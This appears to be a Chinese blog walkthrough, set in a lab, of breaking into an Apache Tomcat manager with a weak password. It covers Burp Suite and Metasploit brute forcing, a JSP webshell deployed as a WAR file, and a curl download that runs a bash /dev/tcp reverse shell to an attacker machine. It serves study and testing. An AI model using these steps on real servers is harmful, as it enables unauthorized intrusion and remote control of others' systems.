Tomcat弱口令复现及利用


Posted in Servers onMay 06, 2022

漏洞描述

Tomcat有一个管理后台,其用户名和密码在Tomcat安装目录下的conf\tomcat-users.xml文件中配置,不少管理员为了方便,经常采用弱口令。Tomcat 支持在后台部署 war 文件,可以直接将 webshell 部署到 web 目录下。其中,欲访问后台,需要对应用户有相应权限。
Tomcat7+ 权限分为:
manager(后台管理)

manager-gui 拥有html页面权限
manager-status 拥有查看status的权限
manager-script 拥有text接口的权限,和status权限
manager-jmx 拥有jmx权限,和status权限
host-manager(虚拟主机管理)

admin-gui 拥有html页面权限
admin-script 拥有text接口权限
二、漏洞影响
Tomcat <= 6.0.0 默认用户名为admin,密码为空,无暴力破解限制。
Tomcat >= 6.0.0 无默认用户,五次失败后,账户即被锁定。
但是正常安装的情况下,tomcat8 中默认没有任何用户,且 Manager 页面只允许本地 IP 访问。只有管理员手工修改了这些属性的情况下,才可以进行攻击。

复现

环境

一台攻击机(kali-2021)192.168.141.190
受害机(vulhub搭建的)192.168.141.194
一台用来下载反弹shell脚本的服务器(内网,如果有服务器更好)192.168.141.128(利用时让受害主机下载shell文件实现反弹shell)

攻击流程

按照前人经验可以使用burpsuite进行爆破或者使用msf进行爆破
首先是根据burpsuite进行爆破:
抓取请求数据包可以看到

Tomcat弱口令复现及利用

=其中没有看到熟悉的账号密码,但是其中’Authorization: Basic dG9tY2F0OnRvbWNhdA=='将其中的base64字符串解密可以看到结果格式为"tomcat:tomcat"所以将请求包送至爆破模块,构造格式为x:x的payload

Tomcat弱口令复现及利用

Tomcat弱口令复现及利用

Tomcat弱口令复现及利用

Tomcat弱口令复现及利用

结果中的200即为成功,但是前面说明了tomcat8或有防爆破机制,当一个用户名登录超过五次就会锁定账户,网上有说要用"tomcat暴破图形化—绕过tomcat 6/7/8的防暴破机制"这个脚本来绕过但是作者没有找到免费的,就不测试了.
其次使用过msf进行爆破

Tomcat弱口令复现及利用

msf中找到上面的模块配置出options的rhosts和rport就可以进行爆破(run)了

Tomcat弱口令复现及利用

可以看到用户名和密码在都是tomcat的时候爆破成功,而且可以看到msf应该是自带了绕过防爆破脚本,而且可以通过自定义user和password文件进行测试,所以作者更推荐使用msf爆破方式

利用

msf利用

这里强调一下,在作者复现网上说的使用exploit/multi/http/tomcat_mgr_deploy但是在配置好rhoss和rport进行run的时候出现无法拿到shell问题

Tomcat弱口令复现及利用

所以作者使用了exploit/multi/http/tomcat_mgr_upload进行利用配置同deploy,配置httpusername,httppassword,rhosts.rport 然后运行拿到shell

Tomcat弱口令复现及利用

反弹shell利用

整体思路:首先在网页端登录进管理后台上传jsp后门文件,然后访问这个jsp后门即可,虽然上传之后就可以通过shell软件控制,但是为了复习反弹shell的过程,作者将进一步通过上传的jsp一句话木马(也可以上传大马)进行反弹shell.

首先将一句话shelloneword.jsp(一句话木马文件)通过命令,jar cvf shelloneword.war shelloneword.jsp 执行成功后在管理后台找到如下然后上传

Tomcat弱口令复现及利用

Tomcat弱口令复现及利用

成功之后可以在这看到结果

之后通过各种软件访问http://192.168.141.194:8080/shelloneword/shelloneword.jsp?i= xxxx就行了

但是作者的方式是通过让受害主机访问服务器主机下载shell文件,进行反弹shell,所以前面只是中间过程,首先让受害主机执行i=curl -o /shell.sh http://192.168.141.128/shell.txt 其中shell.txt文件内容为

bash -i >& /dev/tcp/192.168.141.190/7777 0>&1

将ip和端口改为自己的,然后打开nc 监听7777端口,访问http://192.168.141.194:8080/shelloneword/shelloneword.jsp?i=bash /shell.sh

Tomcat弱口令复现及利用

反弹shell成功

参考文章

[1] https://blog.csdn.net/qq_33020901/article/details/98357659
[2] https://blog.csdn.net/weixin_44037296/article/details/116376114
[3] https://blog.csdn.net/qq_43665434/article/details/116903953
[4] https://www.cnblogs.com/henry666/p/14379888.html
[5]https://www.cnblogs.com/qianxinggz/p/13440366.html
[6]https://blog.csdn.net/weixin_42432317/article/details/90208213

到此这篇关于Tomcat弱口令复现及利用的文章就介绍到这了!


Tags in this post...

Servers 相关文章推荐
nginx常用命令放入shell脚本详解
Mar 31 Servers
Nginx反向代理多个服务器的实现方法
Mar 31 Servers
Nginx访问日志及错误日志参数说明
Mar 31 Servers
nginx配置文件使用环境变量的操作方法
Jun 02 Servers
解决xampp安装后Apache无法启动
Mar 21 Servers
配置Kubernetes外网访问集群
Mar 31 Servers
阿里云ECS云服务器快照的概念以及如何使用
Apr 21 Servers
Windows server 2012 R2 安装IIS服务器
Apr 29 Servers
centos7安装mysql5.7经验记录
May 02 Servers
vscode内网访问服务器的方法
Jun 28 Servers
阿里云服务器(windows)手动部署FTP站点详细教程
Aug 05 Servers
Vscode中SSH插件如何远程连接Linux
nginx配置限速限流基于内置模块
May 02 #Servers
Nginx配置之禁止指定IP访问
centos7安装mysql5.7经验记录
May 02 #Servers
使用 Docker Compose 构建复杂的多容器App
Apr 30 #Servers
搭建Yolov5服务器
KVM基础命令详解
Apr 30 #Servers
You might like
利用php获取服务器时间的实现代码
2013/06/07 PHP
PHP处理大量表单字段的便捷方法
2015/02/07 PHP
php array_merge函数使用需要注意的一个问题
2015/03/30 PHP
PHP简单实现欧拉函数Euler功能示例
2017/11/06 PHP
Ajax中的JSON格式与php传输过程全面解析
2017/11/14 PHP
ThinkPHP框架实现FTP图片上传功能示例
2019/04/08 PHP
PHP 文件上传限制问题
2019/09/01 PHP
javascript图像处理—仿射变换深度理解
2013/01/16 Javascript
JQuery事件e参数的方法preventDefault()取消默认行为
2013/09/26 Javascript
禁止IE用右键的JS代码
2013/12/30 Javascript
javascript中使用正则表达式清理table样式的代码
2020/04/01 Javascript
javascript实现九宫格相加数值相等
2020/05/28 Javascript
jQ处理xml文件和xml字符串的方法(详解)
2016/11/22 Javascript
使用js获取伪元素的content实例
2017/10/24 Javascript
Vue.js实现的计算器功能完整示例
2018/07/11 Javascript
vue父组件异步获取数据传给子组件的方法
2018/07/26 Javascript
vue设置动态请求地址的例子
2019/11/01 Javascript
vue-router 中 meta的用法详解
2019/11/01 Javascript
Javascript confirm多种使用方法解析
2020/09/25 Javascript
js加减乘除精确运算方法实例代码
2021/01/17 Javascript
[02:50]【扭转乾坤,只此一招】DOTA2永雾林渊版本开启新篇章
2020/12/22 DOTA
Python测试人员需要掌握的知识
2018/02/08 Python
Python cookbook(数据结构与算法)筛选及提取序列中元素的方法
2018/03/19 Python
基于python requests库中的代理实例讲解
2018/05/07 Python
pytorch中tensor的合并与截取方法
2018/07/26 Python
Python 利用pydub库操作音频文件的方法
2019/01/09 Python
python filecmp.dircmp实现递归比对两个目录的方法
2020/05/22 Python
Lands’ End英国官方网站:高质量男女服装
2017/10/07 全球购物
C# .NET面试题
2015/11/28 面试题
英文求职信结束语大全
2013/10/26 职场文书
党员一句话承诺大全
2014/03/28 职场文书
毕业设计说明书
2014/05/07 职场文书
上海世博会口号
2014/06/19 职场文书
2015年度物业公司工作总结
2015/04/27 职场文书
写给纪委的违纪检讨书
2015/05/05 职场文书
大学生受助感言
2015/08/01 职场文书